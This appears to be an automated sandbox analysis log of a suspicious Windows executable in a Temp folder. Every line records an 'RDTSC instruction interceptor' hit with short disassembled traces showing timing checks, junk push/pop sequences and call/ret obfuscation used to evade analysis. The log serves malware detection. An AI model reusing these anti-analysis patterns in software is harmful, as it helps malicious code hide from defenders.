Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8904F9 second address: 890504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F79C0513866h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 890504 second address: 89057D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 513358F9h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F79C0CFE298h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dh, 32h 0x0000002a mov edx, dword ptr [ebp+122D3D96h] 0x00000030 or dword ptr [ebp+122D1D75h], esi 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a jg 00007F79C0CFE29Ch 0x00000040 push 00000003h 0x00000042 mov edx, 6166C6AEh 0x00000047 call 00007F79C0CFE299h 0x0000004c jmp 00007F79C0CFE29Ch 0x00000051 push eax 0x00000052 pushad 0x00000053 push ecx 0x00000054 je 00007F79C0CFE296h 0x0000005a pop ecx 0x0000005b push edi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 89057D second address: 8905C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b jmp 00007F79C0513876h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F79C0513877h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8905C1 second address: 8905F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F79C0CFE2A2h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8905F2 second address: 89061A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79C0513866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c add ecx, dword ptr [ebp+122D3BA6h] 0x00000012 lea ebx, dword ptr [ebp+1244637Bh] 0x00000018 sbb cx, 5C23h 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 je 00007F79C051386Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 89061A second address: 89061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 89061E second address: 890640 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F79C0513873h 0x00000008 jmp 00007F79C051386Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jns 00007F79C0513866h 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 890640 second address: 89064A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F79C0CFE29Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8906C6 second address: 8906F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F79C0513870h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F79C0513876h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8906F7 second address: 890701 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F79C0CFE296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 890701 second address: 890721 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79C051386Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b xor cl, 00000000h 0x0000000e push 00000000h 0x00000010 push 78DB83CAh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 890721 second address: 890732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0CFE29Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 890732 second address: 8907BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F79C0513866h 0x00000009 jnl 00007F79C0513866h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 78DB834Ah 0x00000019 pushad 0x0000001a add edi, 7F5A872Bh 0x00000020 pushad 0x00000021 stc 0x00000022 jc 00007F79C0513866h 0x00000028 popad 0x00000029 popad 0x0000002a push 00000003h 0x0000002c mov edx, dword ptr [ebp+122D3D1Ah] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F79C0513868h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e push edi 0x0000004f mov esi, dword ptr [ebp+122D3D66h] 0x00000055 pop edx 0x00000056 mov dword ptr [ebp+122D1D7Bh], eax 0x0000005c adc esi, 6FBDE888h 0x00000062 push 00000003h 0x00000064 jmp 00007F79C0513871h 0x00000069 push 5EE41C04h 0x0000006e pushad 0x0000006f push ebx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8908E0 second address: 8908E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8908E4 second address: 8908EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8908EA second address: 8908EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8908EF second address: 890921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jno 00007F79C0513873h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 jmp 00007F79C051386Ah 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 890921 second address: 89092F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F79C0CFE29Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 89092F second address: 8909A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push ecx 0x0000000a push ebx 0x0000000b jbe 00007F79C0513866h 0x00000011 pop ebx 0x00000012 pop ecx 0x00000013 pop eax 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F79C0513868h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 sub dword ptr [ebp+122D36D2h], ecx 0x00000036 mov edx, dword ptr [ebp+122D3DD6h] 0x0000003c push 00000000h 0x0000003e xor edx, dword ptr [ebp+122D3C2Ah] 0x00000044 push 00000003h 0x00000046 jc 00007F79C051386Ch 0x0000004c mov ecx, dword ptr [ebp+122D3BDEh] 0x00000052 call 00007F79C0513869h 0x00000057 jmp 00007F79C051386Eh 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push esi 0x00000060 je 00007F79C0513866h 0x00000066 pop esi 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8909A8 second address: 890A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F79C0CFE29Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F79C0CFE2A8h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jbe 00007F79C0CFE2B7h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 890A08 second address: 890A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 890A0F second address: 890A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F79C0CFE2A3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e mov dword ptr [ebp+122D2C6Ch], ecx 0x00000014 add edx, 37219021h 0x0000001a lea ebx, dword ptr [ebp+1244638Fh] 0x00000020 clc 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AE6DC second address: 8AE6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AE6E0 second address: 8AE6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AE6E6 second address: 8AE6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AE6EC second address: 8AE6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AE6F2 second address: 8AE6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AE9BE second address: 8AE9C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AE9C2 second address: 8AE9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AE9C6 second address: 8AE9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AF04C second address: 8AF050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AF4E8 second address: 8AF502 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79C0CFE296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F79C0CFE2A0h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AF502 second address: 8AF50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AF50A second address: 8AF52D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F79C0CFE296h 0x00000008 jmp 00007F79C0CFE2A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8A7756 second address: 8A775C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AF96D second address: 8AF977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AF977 second address: 8AF97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8AF97B second address: 8AF9BF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79C0CFE296h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e js 00007F79C0CFE2B0h 0x00000014 jmp 00007F79C0CFE29Eh 0x00000019 jmp 00007F79C0CFE29Ch 0x0000001e pushad 0x0000001f jmp 00007F79C0CFE2A1h 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8B05CD second address: 8B05F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C051386Fh 0x00000009 popad 0x0000000a push edx 0x0000000b jmp 00007F79C0513870h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8B3AA3 second address: 8B3AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8B3AA9 second address: 8B3AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8B4212 second address: 8B421B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8BA618 second address: 8BA61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8BA61C second address: 8BA63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79C0CFE2A6h 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8BA63E second address: 8BA642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8BA642 second address: 8BA648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 87C4F0 second address: 87C529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jg 00007F79C0513866h 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79C0513877h 0x00000017 jmp 00007F79C0513870h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C05D8 second address: 8C05DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C05DC second address: 8C05E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C05E2 second address: 8C05E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C05E7 second address: 8C05F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F79C0513866h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C0779 second address: 8C07A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F79C0CFE296h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F79C0CFE2A8h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C0939 second address: 8C093E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C10B7 second address: 8C10BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C10BD second address: 8C10C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C10C1 second address: 8C10F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F79C0CFE2A3h 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C10F3 second address: 8C110D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 jl 00007F79C0513866h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F79C051386Ah 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C12D8 second address: 8C12E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C3730 second address: 8C373A instructions: 0x00000000 rdtsc 0x00000002 js 00007F79C0513866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C373A second address: 8C3744 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79C0CFE29Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C3744 second address: 8C37B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a mov esi, dword ptr [ebp+122D3972h] 0x00000010 mov eax, dword ptr [ebp+122D3B3Ah] 0x00000016 popad 0x00000017 jo 00007F79C0513883h 0x0000001d pushad 0x0000001e sub dword ptr [ebp+122D2348h], edx 0x00000024 jmp 00007F79C0513875h 0x00000029 popad 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F79C0513868h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 xor edi, 4359DD2Fh 0x0000004c push 00000000h 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C37B3 second address: 8C37B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C42C5 second address: 8C42CF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F79C0513866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C42CF second address: 8C433F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F79C0CFE298h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D3B62h] 0x0000002c jmp 00007F79C0CFE2A7h 0x00000031 push 00000000h 0x00000033 or dword ptr [ebp+122D2DA3h], ecx 0x00000039 push 00000000h 0x0000003b mov edi, edx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push esi 0x00000042 pop esi 0x00000043 jnp 00007F79C0CFE296h 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C5DCA second address: 8C5DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C5DD5 second address: 8C5DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A7h 0x00000007 jmp 00007F79C0CFE29Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C5DFF second address: 8C5E26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F79C0513866h 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F79C0513866h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F79C0513866h 0x0000001d jmp 00007F79C051386Ah 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 8C5E26 second address: 8C5E33 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F79C0CFE296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 882EE1 second address: 882EE6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
